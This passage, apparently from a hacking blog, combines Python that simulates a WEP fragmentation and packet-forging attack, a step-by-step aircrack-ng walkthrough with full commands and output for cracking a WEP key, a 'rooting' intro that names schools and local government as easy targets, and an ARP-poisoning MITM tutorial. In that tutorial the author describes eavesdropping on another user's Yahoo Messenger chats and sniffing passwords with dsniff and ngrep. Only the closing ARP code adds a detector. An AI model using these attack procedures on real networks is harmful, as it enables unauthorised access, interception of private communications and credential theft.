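    """WEP integrity check value: little-endian CRC-32 of the plaintext."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key, iv, plaintext):
    """WEP body: IV(3) | key id(1) | RC4(iv||key) XOR (plaintext | ICV)."""
    body = plaintext + icv(plaintext)
    return iv + b"\x00" + xor(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key, frame):
    """Return the plaintext, or None when the ICV fails (the AP then drops the frame)."""
    iv, body = frame[:3], frame[4:]
    plain = xor(body, rc4_keystream(iv + key, len(body)))
    data = plain[:-4]
    return data if icv(data) == plain[-4:] else None


def keystream_from_known_plaintext(frame, known):
    """ciphertext XOR known plaintext = keystream for this frame's IV (no key needed)."""
    return frame[:3], xor(frame[4:4 + len(known)], known)


def encrypt_with_keystream(iv, ks, plaintext):
    """packetforge-ng's trick: reuse an IV and its keystream to encrypt chosen data."""
    body = plaintext + icv(plaintext)
    if len(body) > len(ks):
        raise ValueError("need %d keystream bytes, have %d" % (len(body), len(ks)))
    return iv + b"\x00" + xor(body, ks)


def ap_relay(key, fragments):
    """Simulated AP: decrypt each fragment, reassemble, re-send under a fresh IV."""
    parts = [wep_decrypt(key, f) for f in fragments]
    if any(p is None for p in parts):
        return None                       # a bad ICV anywhere and nothing is relayed
    return wep_encrypt(key, os.urandom(3), b"".join(parts))


def fragmentation_attack(captured_frame, want=68):
    """Turn 8 keystream bytes into `want` bytes by bouncing fragments off the AP.
    `want` - 4 must be a multiple of 4: each fragment carries 4 chosen bytes + a 4-byte ICV."""
    iv, ks = keystream_from_known_plaintext(captured_frame, LLC_SNAP_ARP)
    chosen = bytes(range(want - 4))       # attacker-chosen payload, so its plaintext is known
    step = len(ks) - 4
    frags = [encrypt_with_keystream(iv, ks, chosen[i:i + step])
             for i in range(0, len(chosen), step)]
    relayed = ap_relay(WEP_KEY, frags)    # the AP is the only party that uses WEP_KEY
    if relayed is None:
        raise RuntimeError("AP rejected a fragment")
    # The relayed frame encrypts chosen+ICV under a new IV: a keystream as long as the frame.
    return keystream_from_known_plaintext(relayed, chosen + icv(chosen))


def forge_arp_request(iv, ks, sender_mac=bytes.fromhex("001122334455")):
    """Build and encrypt a full ARP request with the recovered keystream (like packetforge-ng -0)."""
    arp = LLC_SNAP_ARP + struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, 1,
                                     sender_mac, b"\xff" * 4, b"\x00" * 6, b"\xff" * 4)
    return encrypt_with_keystream(iv, ks, arp)


def demo():
    """End to end: capture one AP frame, expand the keystream, forge, and check the AP accepts it."""
    captured = wep_encrypt(WEP_KEY, bytes.fromhex("a1b2c3"), LLC_SNAP_ARP + b"\x00" * 28)
    iv, ks = fragmentation_attack(captured)
    forged = forge_arp_request(iv, ks)
    return wep_decrypt(WEP_KEY, forged) is not None


if __name__ == "__main__":
    print("AP accepted forged frame:", demo())
```

The first 8 keystream bytes come from the LLC/SNAP header that every ARP frame begins with; one round bounces sixteen fragments of 4 chosen bytes plus ICV off the AP, and the relayed frame hands back a keystream as long as the reassembled data. aireplay-ng's "Trying to get 384 bytes" and then "1500 bytes" messages are the same growth over successive rounds.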
See aircrack-ng.org for the pros and cons of each attack.<br /><br />Fragmentation attack:<br />aireplay-ng -5 -b 13:13:13:13:13:13 -h 00:11:22:33:44:55 rausb0<br />Where:<br />-5 means the fragmentation attack<br />-b 13:13:13:13:13:13 is the access point MAC address<br />-h 00:11:22:33:44:55 is the MAC address of our card and must match the MAC used in the fake authentication<br />rausb0 is the wireless interface name<br />The system will respond:<br /> Waiting for a data packet...<br /> Read 127 packets...<br /> <br /> Size: 114, FromDS: 1, ToDS: 0 (WEP)<br /> <br /> BSSID = 13:13:13:13:13:13<br /> Dest. MAC = 01:00:5E:00:00:FB<br /> Source MAC = 00:40:F4:77:E5:C9<br /> <br /> 0x0000: 0842 0000 0100 5e00 00fb 0014 6c7e 4080 .B....^.....l~@.<br /> 0x0010: 0040 f477 e5c9 6052 8c00 0000 3073 d265 .@.w..`R....0s.e<br /> 0x0020: c402 790b 2293 c7d5 89c5 4136 7283 29df ..y.".....A6r.).<br /> 0x0030: 4e9e 5e13 5f43 4ff5 1b37 3ff9 4da4 c03b N.^._CO..7?.M..;<br /> 0x0040: 8244 5882 d5cc 7a1f 2b9b 3ef0 ee0f 4fb5 .DX...z.+.>...O.<br /> 0x0050: 4563 906d 0d90 88c4 5532 a602 a8ea f8e2 Ec.m....U2......<br /> 0x0060: c531 e214 2b28 fc19 b9a8 226d 9c71 6ab1 .1..+(...."m.qj.<br /> 0x0070: 9c9f ..<br /> <br /> Use this packet ? y<br />When a data packet from the access point (FromDS: 1) arrives, enter y to proceed. You may need to try a few before one works.<br />When successful, the system responds:<br /> Saving chosen packet in replay_src-0203-180328.cap<br /> Data packet found!<br /> Sending fragmented packet<br /> Got RELAYED packet!!<br /> Thats our ARP packet!<br /> Trying to get 384 bytes of a keystream<br /> Got RELAYED packet!!<br /> Thats our ARP packet!<br /> Trying to get 1500 bytes of a keystream<br /> Got RELAYED packet!!<br /> Thats our ARP packet!<br /> Saving keystream in fragment-0203-180343.xor<br /> Now you can build a packet with packetforge-ng out of that 1500 bytes keystream<br />Success! 
The file fragment-0203-180343.xor is used in the next step to generate an ARP packet.<br />Troubleshooting Tips<br />Sometimes the first packet won't work; try a few more. This goes for both attacks. Visit aircrack-ng.org for more information on the chopchop attack.<br /><br />Step 4 - Use packetforge-ng to create an ARP packet<br /><br />Use the PRGA keystream from the last step (the file ending in .xor). packetforge-ng encrypts a freshly built ARP request with it. When that request is injected, the AP rebroadcasts it, and every rebroadcast carries a new IV.<br />packetforge-ng -0 -a 13:13:13:13:13:13 -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arp-request<br />Where:<br />-0 means generate an ARP packet<br />-a 13:13:13:13:13:13 is the access point MAC address<br />-h 00:11:22:33:44:55 is the MAC address of our card<br />-k 255.255.255.255 is the destination IP (most APs relay requests for 255.255.255.255)<br />-l 255.255.255.255 is the source IP (same reasoning)<br />-y fragment-0203-180343.xor is the file to read the PRGA keystream from<br />-w arp-request is the file to write the ARP packet to<br />The system will respond:<br /> Wrote packet to: arp-request<br /><br />Step 5 - Start airodump-ng<br /><br />Open another console session to capture the generated IVs, and enter:<br />airodump-ng -c 9 --bssid 13:13:13:13:13:13 --ivs -w capture rausb0<br />Where:<br />-c 9 is the channel of the wireless network<br />--bssid 13:13:13:13:13:13 is the access point MAC address; this filters out traffic from other networks<br />--ivs specifies that you only want to save the IVs, which keeps the file as small as possible 
(Do not use --ivs if you want to crack with aircrack-ptw, which needs full .cap files.)<br />-w capture is the file-name prefix for the file that will contain the IVs.<br />rausb0 is the interface name.<br /><br />Step 6 - Inject the ARP packet<br /><br />In the console session where you generated the ARP packet, enter:<br />aireplay-ng -2 -r arp-request rausb0<br />Where:<br />-2 means interactive frame selection (replay a chosen frame)<br />-r arp-request is the file to read the ARP packet from<br />rausb0 is the interface to use<br />The system will respond:<br /> Size: 68, FromDS: 0, ToDS: 1 (WEP)<br /> <br /> BSSID = 13:13:13:13:13:13<br /> Dest. MAC = FF:FF:FF:FF:FF:FF<br /> Source MAC = 00:09:5B:EC:EE:F2<br /> <br /> 0x0000: 0841 0201 0014 6c7e 4080 0009 5bec eef2 .A....l~@...[...<br /> 0x0010: ffff ffff ffff 8001 8f00 0000 7af3 8be4 ............z...<br /> 0x0020: c587 b696 9bf0 c30d 9cd9 c871 0f5a 38c5 ...........q.Z8.<br /> 0x0030: f286 fdb3 55ee 113e da14 fb19 17cc 0b5e ....U..>.......^<br /> 0x0040: 6ada 92f2 j...<br /> <br /> Use this packet ? y<br />Enter y to use this packet. aireplay-ng then reports how many packets it is injecting and reminds you to start airodump-ng if it is not already running:<br /> Saving chosen packet in replay_src-0204-104917.cap<br /> You should also start airodump-ng to capture replies.<br /><br /> End of file.<br /><br />While this command is running successfully, the airodump-ng screen will look similar to:<br /> CH 9 ][ Elapsed: 16 s ][ 2007-02-04 11:04<br /> <br /> BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br /> <br /> 13:13:13:13:13:13 47 100 179 2689 336 9 11 WEP WEP TEST<br /> <br /> BSSID STATION PWR Lost Packets Probes<br /> <br /> 13:13:13:13:13:13 00:11:22:33:44:55 29 0 2707<br />Notice that the station's packet count is roughly equal to the BSSID's #Data count: every injected request is being answered with a fresh IV, which means injection is working well. 
A rate of 336 data packets per second (the #/s column) is a further indicator that injection is working well.<br /><br />Step 7 - Run aircrack-ng to obtain the WEP key<br /><br />Start another console session and enter:<br />aircrack-ng *.ivs -b 13:13:13:13:13:13<br />Where:<br />*.ivs selects all files ending in .ivs<br />-b 13:13:13:13:13:13 selects the one access point we are interested in<br /><br />You can run this while packets are still being generated; aircrack-ng re-reads the capture files periodically. Before long, the WEP key will be calculated and displayed. With the KoreK attacks you need roughly 250,000 IVs for a 64-bit key and 1,500,000 IVs for a 128-bit key. These are approximations; you may need more or fewer.<br /><br />Troubleshooting Tips:<br />Sometimes you need to try various options to crack the WEP key. Use -n to set the key length (64 or 128). Use -f to try larger fudge factors. Use -k to disable individual KoreK attacks.<br />For aircrack-ptw, enter:<br />aircrack-ng -z *.cap -b 13:13:13:13:13:13<br />The -z switch selects the PTW attack. PTW needs the full ARP packets, so it only works on .cap files, not .ivs files. It uses a different algorithm and cracks keys with a fraction of the data: I've cracked 128-bit WEP with only 25k IVs.<br /><br />Alternate Solution:<br />Here is a way that takes any data packet sent by the access point and rewrites it as a broadcast from a client, so that the AP relays it and generates a new IV each time.<br /><br />The downside is that if you pick up a 1000-byte packet you replay 1000 bytes every time, which can cut the packets-per-second rate substantially. The upside is that the process is simple. If you are lucky you get a small packet to replay, and then this method is comparable to the one above.<br /><br />As always, fake-authenticate first. 
<br />Enter the following command:<br /> aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 13:13:13:13:13:13 -h 00:11:22:33:44:55 rausb0<br />Where:<br />-2 means interactive frame selection<br />-p 0841 sets the Frame Control field (ToDS bit set, FromDS clear, WEP bit set) so the packet looks as if a wireless client is sending it to the AP<br />-c FF:FF:FF:FF:FF:FF sets the destination MAC to broadcast; this is what makes the AP relay the packet, and every relayed copy carries a new IV<br />-b 13:13:13:13:13:13 is the access point MAC address<br />-h 00:11:22:33:44:55 is the MAC address of our card and must match the MAC used in the fake authentication<br />rausb0 is the interface to use<br />The system will respond:<br /> Read 698 packets...<br /><br /> Size: 86, FromDS: 1, ToDS: 0 (WEP)<br /><br /> BSSID = 13:13:13:13:13:13<br /> Dest. MAC = FF:FF:FF:FF:FF:FF<br /> Source MAC = 00:D0:CF:03:34:8C<br /><br /> 0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.<br /> 0x0010: 00d0 cf03 348c a0f4 2000 0000 e233 962a ....4... ....3.*<br /> 0x0020: 90b5 fe67 41e0 9dd5 7271 b8ed ed23 8eda ...gA...rq...#..<br /> 0x0030: ef55 d7b0 a56f bc16 355f 8986 a7ab d495 .U...o..5_......<br /> 0x0040: 1daa a308 6a70 4465 9fa6 5467 d588 c10c ....jpDe..Tg....<br /> 0x0050: f043 09f6 5418 .C..T.<br /><br /> Use this packet ? y<br />Enter y to select the packet and start injecting it. Remember, the smaller the packet, the better. Injection then starts:<br /> Saving chosen packet in replay_src-0411-145110.cap<br /><br /> Sent 10204 packets...(455 pps)<br /><br />If you have not already started airodump-ng, start it now. Once you have enough IVs, run aircrack-ng as in step 7 and attempt to crack the WEP key.<br /><br />Another variation of this attack is to replay packets from a previous capture. 
You must have captured full packets, not just the IVs (so no --ivs when running airodump-ng).<br />Here is what the command would look like:<br /> aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 13:13:13:13:13:13 -h 00:11:22:33:44:55 -r capture-01.cap rausb0<br />Where -r capture-01.cap reads the frames from a previous capture.<br /><br />Reference: <a href="http://www.aircrack-ng.org/" target="_blank">http://www.aircrack-ng.org/</a><br /><br />Rooting a Windows Machine: Rooting? (2009-06-23)<br /><br />What is rooting? Many people ask this question, and it can be explained simply: it is the hacking you see in those bad "H@cker" flicks. "Yo, DeepSeven, I'm inside the FBI's super-mega-secret mainframe, yeah!" "OK 0Nine, crack the GRAPLAP encryption with a reverse hybrid mega crack." Stuff like that: breaking directly into another computer. Here are some terms that will help you understand me and my tutorials.<br /><br />Some terms I use, but not necessarily other people:<br /><br />Foo - Total mastery of a subject; a seriously fly hack. Note that not even I have performed a root attack worthy of "Foo". Better than "Deep Magic".<br /><br />Blue Moon - An easy hack: someone with no firewall and/or file sharing enabled.<br /><br />Red Moon - An almost impossible hack; a target with almost no known vulnerabilities.<br /><br />Terminology everyone uses:<br /><br />Vuln/Exploit - A vulnerability is a coding error that allows remote access; an exploit is the code that takes advantage of it.<br /><br />Service - A long-running program which may open sockets to the internet etc.<br /><br />Rootkit - An almost undetectable backdoor.<br /><br />Things to keep in mind before rooting:<br />1. ALL systems connected to the internet can be rooted.<br /><br />2. Rooting is difficult.<br /><br />3. Rooting can be fun.<br /><br />4. Though most of the time it sucks.<br /><br />5. There is always a hacker who can school you.<br /><br />6. Advanced rooting NEEDS knowledge of C, and C++ if you like.<br /><br />7. 
Other languages are helpful too.<br /><br />8. Rooting can be very difficult to understand.<br /><br />Systems you COULD probably root:<br /><br />-Your school<br />-Your local government<br />-Yourself<br />-Your mom<br />-Any computer run by someone careless<br /><br />Systems you probably COULD NOT root:<br /><br />-The Pentagon<br />-The CIA<br />-Yahoo.com<br />-Google.com<br />-Any computer which is not connected to the internet<br /><br />That's a nominal intro to the world of rooting.<br /><br />MITM by ARP poisoning - Linux (2009-06-23)<br /><br />Well, I noticed the Linux area was kind of empty, so I decided to fix that ^_^ with a little something I pulled off in the last few days. First of all you should understand how Local Area Networks (LANs) work. On a hubbed network (or an 802.11 wireless one) when a computer sends data to another, the hub repeats that data to ALL hosts on the network; only the intended receiver accepts it and all the others drop it. Running a sniffer such as ethereal (now Wireshark) on a hubbed network puts your NIC into promiscuous mode, so it captures the data that should have been discarded and lets you view it. On switched networks things are more secure: a switch only forwards data to the port where the intended receiver is, period. To address a frame at all, hosts on a LAN use a protocol called ARP (Address Resolution Protocol), which maps IP addresses on the LAN to MAC addresses (a supposedly unique address burned into each NIC; there are ways of spoofing your MAC address, though). Say a host has data for 192.168.0.2. It has to put the right destination MAC on the frame, and the switch then has to know which port (I mean a physical port on the switch, not your TCP/UDP ports) to send it out of, in other words on which wire to transmit it. 
So the host which sends the data broadcasts an ARP request like "Who has 192.168.0.2? Tell me your MAC address", to which 192.168.0.2 responds "I'm 192.168.0.2, my MAC address is AA:BB:CC:11:22:33" (a completely bogus MAC address, used here for demonstration). The host then sends the frame, addressed to that MAC, to the switch, which forwards it out of the port it has learned that MAC on. The flaw in ARP is that it is stateless: a host accepts any ARP reply it receives, whether or not it ever sent a request, and overwrites its cache entry with the newest answer. So if I keep sending crafted ARP replies to a host saying "I'm 192.168.0.2, my MAC address is AA:BB:CC:44:55:66" (my own MAC), all packets from that host destined for 192.168.0.2 are delivered to me instead. Because I send these replies continuously and the real 192.168.0.2 only answers when asked, my reply is nearly always the latest one in the victim's cache when it sends. This is called ARP poisoning. MITM stands for Man-In-The-Middle: an attack of this nature turns your computer into an invisible proxy between two other computers, basically turning<br /><br />192.168.0.2<-------->192.168.0.3 into<br />192.168.0.2<--->my_ip_address<--->192.168.0.3<br /><br />This is accomplished by ARP-poisoning both hosts and forwarding the received packets. To do a MITM between 192.168.0.2 and 192.168.0.3 you poison 192.168.0.2 into thinking you're 192.168.0.3 and 192.168.0.3 into thinking you're 192.168.0.2, and DON'T FORGET to turn on IP forwarding first, because if you don't you kill the connection between the two hosts (a denial of service that also gives you away). Next I'm going to show you how to sniff packets between two hosts on the same LAN using arpspoof and ethereal. arpspoof is found in the dsniff package and ethereal comes with almost every Linux distro. For this example I used the Auditor boot CD, which can be found at remote-exploit.org. 
What I wanted to do was listen in on Yahoo Messenger conversations. So I did the following:<br /><br />First I turned on IP forwarding: 'echo 1 > /proc/sys/net/ipv4/ip_forward'<br />Then I chose my victim. At the time I knew 192.168.0.5 was having a Yahoo Messenger conversation, so I ran:<br />'arpspoof -t 192.168.0.5 192.168.0.99', which makes 192.168.0.5 believe that I'm 192.168.0.99, so it sends every packet destined for 192.168.0.99 to me. 192.168.0.99 is the gateway in my LAN, our link to the internet, so all Yahoo Messenger packets must pass through it.<br /><br />Then I ran:<br /><br />'arpspoof -t 192.168.0.99 192.168.0.5', which makes all packets from the internet to 192.168.0.5 pass through me too (without this I'd only get half the conversation: what 192.168.0.5 sends, to be exact).<br /><br />Then I started ethereal capturing on eth0 (my only NIC) with real-time update of the packet list turned on (so the list updates as packets are captured). The list floods with packets, mostly ARP because arpspoof sends tons of them out, so it is a good idea to apply the display filter 'ymsg', which shows only the Yahoo Messenger packets. A good option if you want to sniff for certain keywords is the 'ngrep' utility: 'ngrep pass' shows every packet containing the string 'pass'. The 'dsniff' utility automatically looks for HTTP, FTP, POP3 etc. passwords and displays them in readable form. Another good utility on the Auditor CD is 'webspy', which redirects your Netscape browser to URLs sniffed from captured packets, letting you surf in parallel with the victim (a cool party trick lol). 
If you have any questions on this article, don't hesitate to PM me.
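As an added example (my code, not from the original post or the dsniff project), here is the ARP poisoning described above done in Python at the byte level, with nothing sent on the wire: it builds the unsolicited "is-at" reply that arpspoof puts on the wire, parses a constructed capture of such frames, and runs the two checks a defender would use to spot the attack, an IP whose MAC binding changes and a sender emitting many replies nobody asked for. The IP addresses are the ones from the post; the MAC addresses and the threshold of five unsolicited replies are assumptions.

```python
"""ARP cache poisoning at the byte level: build the unsolicited 'is-at' reply
arpspoof sends, then detect a poisoning run in a constructed capture.
Added example with made-up MACs; it sends nothing on the wire."""
import struct
from collections import defaultdict

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

# Hosts from the post; the MAC addresses are assumptions.
VICTIM, VICTIM_MAC = "192.168.0.5", "00:0c:29:aa:bb:cc"
GATEWAY, GATEWAY_MAC = "192.168.0.99", "00:50:56:de:ad:01"
ATTACKER_MAC = "00:11:22:33:44:55"


def mac(s): return bytes.fromhex(s.replace(":", ""))
def ip(s): return bytes(int(o) for o in s.split("."))
def mac_str(b): return ":".join("%02x" % x for x in b)
def ip_str(b): return ".".join(str(x) for x in b)


def arp_frame(op, dst_mac, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II header + 28-byte ARP body (42 bytes total)."""
    eth = mac(dst_mac) + mac(sender_mac) + struct.pack("!H", ETH_P_ARP)
    body = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, op,
                       mac(sender_mac), ip(sender_ip), mac(target_mac), ip(target_ip))
    return eth + body


def arp_request(sender_mac, sender_ip, target_ip):
    """Broadcast 'who-has target_ip'."""
    return arp_frame(ARP_REQUEST, "ff:ff:ff:ff:ff:ff", sender_mac, sender_ip,
                     "00:00:00:00:00:00", target_ip)


def poison_reply(attacker_mac, spoofed_ip, victim_mac, victim_ip):
    """What 'arpspoof -t victim_ip spoofed_ip' puts on the wire every couple of seconds:
    a reply to the victim claiming spoofed_ip is-at the attacker's MAC."""
    return arp_frame(ARP_REPLY, victim_mac, attacker_mac, spoofed_ip, victim_mac, victim_ip)


def parse_arp(frame):
    """The fields a detector needs, or None if this is not an Ethernet/IPv4 ARP frame."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"op": op, "eth_src": mac_str(frame[6:12]), "sha": mac_str(sha),
            "spa": ip_str(spa), "tha": mac_str(tha), "tpa": ip_str(tpa)}


class ArpWatch:
    """Track IP->MAC bindings from replies and flag the two signatures of a poisoning run:
    a binding that changes, and a sender answering questions nobody asked."""

    def __init__(self, flood_threshold=5):
        self.bindings = {}                    # ip -> mac learned from replies
        self.open_requests = set()            # (asker_ip, asked_ip) seen, not yet answered
        self.unsolicited = defaultdict(int)   # eth_src -> count of unrequested replies
        self.flood_threshold = flood_threshold

    def feed(self, frame):
        """Process one frame; return the alerts it raised (usually none)."""
        a = parse_arp(frame)
        if a is None:
            return []
        if a["op"] == ARP_REQUEST:
            self.open_requests.add((a["spa"], a["tpa"]))
            return []
        if a["op"] != ARP_REPLY:
            return []
        alerts = []
        if a["eth_src"] != a["sha"]:          # header and payload disagree about the sender
            alerts.append("%s: ethernet source %s differs from ARP sender %s"
                          % (a["spa"], a["eth_src"], a["sha"]))
        if (a["tpa"], a["spa"]) in self.open_requests:   # answers a request we saw
            self.open_requests.discard((a["tpa"], a["spa"]))
        else:
            self.unsolicited[a["eth_src"]] += 1
            if self.unsolicited[a["eth_src"]] == self.flood_threshold:
                alerts.append("%s sent %d unsolicited replies (poisoning?)"
                              % (a["eth_src"], self.flood_threshold))
        old = self.bindings.get(a["spa"])
        if old is not None and old != a["sha"]:
            alerts.append("%s changed from %s to %s" % (a["spa"], old, a["sha"]))
        self.bindings[a["spa"]] = a["sha"]
        return alerts


def run(frames):
    """Run every frame through one ArpWatch and collect the alerts in order."""
    watch, alerts = ArpWatch(), []
    for f in frames:
        alerts.extend(watch.feed(f))
    return alerts


def sample_capture():
    """Constructed capture: two honest request/reply exchanges, then the two arpspoof
    commands from the post running side by side for six rounds."""
    frames = [arp_request(VICTIM_MAC, VICTIM, GATEWAY),
              arp_frame(ARP_REPLY, VICTIM_MAC, GATEWAY_MAC, GATEWAY, VICTIM_MAC, VICTIM),
              arp_request(GATEWAY_MAC, GATEWAY, VICTIM),
              arp_frame(ARP_REPLY, GATEWAY_MAC, VICTIM_MAC, VICTIM, GATEWAY_MAC, GATEWAY)]
    for _ in range(6):
        frames.append(poison_reply(ATTACKER_MAC, GATEWAY, VICTIM_MAC, VICTIM))   # -t .5 .99
        frames.append(poison_reply(ATTACKER_MAC, VICTIM, GATEWAY_MAC, GATEWAY))  # -t .99 .5
    return frames


if __name__ == "__main__":
    for line in run(sample_capture()):
        print(line)
```

Feeding sample_capture() to run() returns three alerts: the gateway's binding and then the victim's flipping to the attacker's MAC, followed by the unsolicited-reply flood. Tools such as arpwatch apply the same binding-change test to live traffic; the flood test is what separates a running arpspoof, which keeps repeating its reply to each target, from the single gratuitous ARP a host legitimately sends when it boots.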